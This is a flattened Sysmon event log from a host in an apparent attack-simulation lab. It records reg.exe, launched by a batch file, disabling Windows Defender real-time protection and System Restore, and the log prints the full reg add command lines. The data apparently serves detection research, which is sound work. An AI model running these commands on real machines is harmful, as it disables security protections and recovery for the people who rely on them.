12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.783{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089,Tamper-DefenderSetValue2021-03-31 12:04:38.771{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpywareDWORD (0x00000001) 10341000x80000000000000009202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.771{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.775{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.756{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSRDWORD (0x00000001) 10341000x80000000000000009193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.756{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.756{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.764{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.756{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableConfigDWORD (0x00000001) 10341000x80000000000000009184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.756{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 